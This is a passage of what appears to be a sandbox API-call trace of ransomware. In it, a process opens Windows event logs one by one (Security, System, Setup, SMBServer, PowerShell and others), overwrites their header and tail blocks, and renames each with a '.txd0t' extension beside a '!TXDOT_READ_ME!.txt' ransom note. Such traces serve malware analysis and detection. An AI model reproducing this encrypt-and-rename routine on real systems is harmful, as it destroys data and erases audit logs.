psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.194] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.194] GetProcessHeap () returned 0xe30000 [0089.194] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf180 | out: hHeap=0xe30000) returned 1 [0089.194] CloseHandle (hObject=0x460) returned 1 [0089.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.txd0t")) returned 1 [0089.199] SetEvent (hEvent=0x404) returned 1 [0089.199] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.206] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" [0089.207] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.txd0t" [0089.207] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.txd0t") returned 0 [0089.207] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx", dwFileAttributes=0x80) returned 1 [0089.208] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.208] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=1052672) returned 1 [0089.208] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.208] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.209] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffefee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.209] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x100000, lpOverlapped=0x0) returned 1 [0089.244] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.244] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x100000, lpOverlapped=0x0) returned 1 [0089.247] FlushFileBuffers (hFile=0x464) returned 1 [0089.345] GetProcessHeap () returned 0xe30000 [0089.345] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed1330 [0089.345] StrCpyW (in: psz1=0xed1330, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" [0089.345] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned="Microsoft-Windows-SettingSync%4Debug.evtx" [0089.345] StrCpyW (in: psz1=0xed1348, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.345] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.346] GetProcessHeap () returned 0xe30000 [0089.346] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1330 | out: hHeap=0xe30000) returned 1 [0089.346] CloseHandle (hObject=0x464) returned 1 [0089.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-settingsync%4debug.evtx.txd0t")) returned 1 [0089.346] SetEvent (hEvent=0x404) returned 1 [0089.346] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.351] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" [0089.351] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.txd0t" [0089.351] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.txd0t") returned 0 [0089.351] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.351] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.351] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.352] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.352] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.353] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.353] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x11000, lpOverlapped=0x0) returned 1 [0089.356] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.356] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x11000, lpOverlapped=0x0) returned 1 [0089.356] FlushFileBuffers (hFile=0x464) returned 1 [0089.493] GetProcessHeap () returned 0xe30000 [0089.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11a) returned 0xed7f88 [0089.494] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" [0089.494] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned="Microsoft-Windows-SMBServer%4Operational.evtx" [0089.494] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.494] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.494] GetProcessHeap () returned 0xe30000 [0089.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.494] CloseHandle (hObject=0x464) returned 1 [0089.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-smbserver%4operational.evtx.txd0t")) returned 1 [0089.495] SetEvent (hEvent=0x404) returned 1 [0089.495] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.502] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" [0089.502] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t" [0089.502] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t") returned 0 [0089.502] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.502] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.503] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.503] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.503] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.504] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.504] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x11000, lpOverlapped=0x0) returned 1 [0089.508] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.509] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x11000, lpOverlapped=0x0) returned 1 [0089.509] FlushFileBuffers (hFile=0x474) returned 1 [0089.629] GetProcessHeap () returned 0xe30000 [0089.629] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1580 [0089.629] StrCpyW (in: psz1=0xed1580, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" [0089.629] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned="Microsoft-Windows-Wcmsvc%4Operational.evtx" [0089.629] StrCpyW (in: psz1=0xed1598, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.629] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.629] GetProcessHeap () returned 0xe30000 [0089.629] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1580 | out: hHeap=0xe30000) returned 1 [0089.629] CloseHandle (hObject=0x474) returned 1 [0089.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-wcmsvc%4operational.evtx.txd0t")) returned 1 [0089.630] SetEvent (hEvent=0x404) returned 1 [0089.630] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.635] StrCpyW (in: psz1=0x414f6d0, psz2="\\\\?\\C:\\Logs\\Security.evtx" | out: psz1="\\\\?\\C:\\Logs\\Security.evtx") returned="\\\\?\\C:\\Logs\\Security.evtx" [0089.635] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Security.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Security.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Security.evtx.txd0t" [0089.635] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Security.evtx.txd0t") returned 0 [0089.635] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx", dwFileAttributes=0x80) returned 1 [0089.636] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.636] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=1118208) returned 1 [0089.636] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.636] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.637] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffeeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.637] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x414f690, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f690*=0x100000, lpOverlapped=0x0) returned 1 [0089.718] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.718] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x414f694, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f694*=0x100000, lpOverlapped=0x0) returned 1 [0089.722] FlushFileBuffers (hFile=0x464) returned 1 [0089.730] GetProcessHeap () returned 0xe30000 [0089.730] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xda) returned 0xe50800 [0089.730] StrCpyW (in: psz1=0xe50800, psz2="\\\\?\\C:\\Logs\\Security.evtx" | out: psz1="\\\\?\\C:\\Logs\\Security.evtx") returned="\\\\?\\C:\\Logs\\Security.evtx" [0089.730] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Security.evtx") returned="Security.evtx" [0089.730] StrCpyW (in: psz1=0xe50818, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.730] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.731] GetProcessHeap () returned 0xe30000 [0089.731] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe50800 | out: hHeap=0xe30000) returned 1 [0089.731] CloseHandle (hObject=0x464) returned 1 [0089.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Security.evtx" (normalized: "c:\\logs\\security.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Security.evtx.txd0t" (normalized: "c:\\logs\\security.evtx.txd0t")) returned 1 [0089.733] SetEvent (hEvent=0x404) returned 1 [0089.733] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.734] StrCpyW (in: psz1=0x414f6e0, psz2="\\\\?\\C:\\Logs\\Setup.evtx" | out: psz1="\\\\?\\C:\\Logs\\Setup.evtx") returned="\\\\?\\C:\\Logs\\Setup.evtx" [0089.734] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Setup.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Setup.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Setup.evtx.txd0t" [0089.734] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Setup.evtx.txd0t") returned 0 [0089.734] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx", dwFileAttributes=0x80) returned 1 [0089.735] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.735] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.735] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.735] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.736] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.737] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f6a0, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f6a0*=0x11000, lpOverlapped=0x0) returned 1 [0089.739] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.739] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f6a4, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f6a4*=0x11000, lpOverlapped=0x0) returned 1 [0089.740] FlushFileBuffers (hFile=0x464) returned 1 [0089.742] GetProcessHeap () returned 0xe30000 [0089.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xd4) returned 0xe3f6f8 [0089.743] StrCpyW (in: psz1=0xe3f6f8, psz2="\\\\?\\C:\\Logs\\Setup.evtx" | out: psz1="\\\\?\\C:\\Logs\\Setup.evtx") returned="\\\\?\\C:\\Logs\\Setup.evtx" [0089.743] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Setup.evtx") returned="Setup.evtx" [0089.743] StrCpyW (in: psz1=0xe3f710, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.743] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.743] GetProcessHeap () returned 0xe30000 [0089.743] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3f6f8 | out: hHeap=0xe30000) returned 1 [0089.743] CloseHandle (hObject=0x464) returned 1 [0089.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Setup.evtx" (normalized: "c:\\logs\\setup.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Setup.evtx.txd0t" (normalized: "c:\\logs\\setup.evtx.txd0t")) returned 1 [0089.743] SetEvent (hEvent=0x404) returned 1 [0089.743] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.744] StrCpyW (in: psz1=0x414f6e0, psz2="\\\\?\\C:\\Logs\\System.evtx" | out: psz1="\\\\?\\C:\\Logs\\System.evtx") returned="\\\\?\\C:\\Logs\\System.evtx" [0089.745] StrCatW (in: psz1="\\\\?\\C:\\Logs\\System.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\System.evtx.txd0t") returned="\\\\?\\C:\\Logs\\System.evtx.txd0t" [0089.745] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\System.evtx.txd0t") returned 0 [0089.745] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\System.evtx", dwFileAttributes=0x80) returned 1 [0089.746] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.746] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=1118208) returned 1 [0089.746] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.746] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.747] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xffeeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.747] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x414f6a0, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f6a0*=0x100000, lpOverlapped=0x0) returned 1 [0089.772] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.772] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x414f6a4, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f6a4*=0x100000, lpOverlapped=0x0) returned 1 [0089.775] FlushFileBuffers (hFile=0x464) returned 1 [0089.783] GetProcessHeap () returned 0xe30000 [0089.783] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xd6) returned 0xe3f6f8 [0089.783] StrCpyW (in: psz1=0xe3f6f8, psz2="\\\\?\\C:\\Logs\\System.evtx" | out: psz1="\\\\?\\C:\\Logs\\System.evtx") returned="\\\\?\\C:\\Logs\\System.evtx" [0089.783] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\System.evtx") returned="System.evtx" [0089.783] StrCpyW (in: psz1=0xe3f710, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.783] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.783] GetProcessHeap () returned 0xe30000 [0089.783] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3f6f8 | out: hHeap=0xe30000) returned 1 [0089.784] CloseHandle (hObject=0x464) returned 1 [0089.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\System.evtx.txd0t" (normalized: "c:\\logs\\system.evtx.txd0t")) returned 1 [0089.784] SetEvent (hEvent=0x404) returned 1 [0089.784] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.842] StrCpyW (in: psz1=0x414f6c0, psz2="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" | out: psz1="\\\\?\\C:\\Logs\\Windows PowerShell.evtx") returned="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" [0089.842] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Windows PowerShell.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.txd0t" [0089.842] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.txd0t") returned 0 [0089.842] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx", dwFileAttributes=0x80) returned 1 [0089.843] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.843] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.843] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.843] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.844] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.844] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f680*=0x11000, lpOverlapped=0x0) returned 1 [0089.847] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.847] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, 